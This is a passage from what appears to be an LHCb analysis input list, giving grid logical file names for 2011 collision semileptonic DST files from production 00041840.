'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018012_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021003_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007121_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059825_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041687_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026185_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008531_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052246_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003268_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065783_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021709_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008601_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054979_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020513_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051407_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037668_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061004_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052810_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018620_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026759_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026128_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055168_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050114_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032691_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010045_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058675_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004176_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019839_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039014_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021741_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067942_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021969_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067269_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023932_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032340_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023097_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061651_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024239_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011684_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027792_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006183_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047508_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029611_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064473_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059214_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062983_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019180_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014584_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043001_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016573_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023888_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030032_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054727_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057325_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016724_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051617_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011109_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020665_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042341_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038931_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020758_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059403_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024100_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027551_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056586_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060325_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054598_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051033_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020014_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007001_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030517_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003801_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005013_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067421_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058188_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022004_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029024_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009417_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029093_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064883_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030949_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030635_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010014_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044076_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00069079_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062663_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061740_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017752_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029980_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060773_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028816_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039135_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014273_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063807_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025275_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011948_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059729_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002754_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044290_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059543_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012232_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007298_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015189_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042804_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011440_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013372_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067351_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030519_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067530_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020883_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059258_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060269_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017411_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013730_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051315_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065610_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058632_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051343_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001922_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024036_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052436_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041281_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021526_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020064_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042087_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053001_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017622_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008816_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059803_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018918_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006384_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025475_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012295_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064453_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019995_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056943_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067033_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034709_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045011_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040108_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035889_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018015_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028878_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022018_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029462_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019316_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065928_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058587_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026705_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007525_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040020_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046752_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006104_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061018_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064650_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034116_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036783_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000787_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063158_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036822_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003957_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054681_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040659_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058027_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033607_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042089_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005616_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060562_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059967_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031119_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005497_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012013_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053738_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014068_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056348_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058121_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001106_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054267_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064647_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004413_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063990_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064649_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067527_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021609_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021777_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045343_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040299_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067034_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006479_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047513_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034652_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057763_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018082_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00048926_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068877_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053944_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040396_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061132_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066857_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002483_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012760_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061851_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015112_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000284_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00069424_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053311_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046577_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007188_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025830_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046134_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027071_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012813_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049334_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060398_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057843_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053670_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006792_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039405_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036168_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050466_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043973_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065304_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042871_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005797_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063936_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055192_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037568_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00048581_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065653_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007563_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020757_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012246_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063804_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054631_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063315_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040063_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047434_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063633_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029413_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047862_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057615_1.semileptonic.dst',
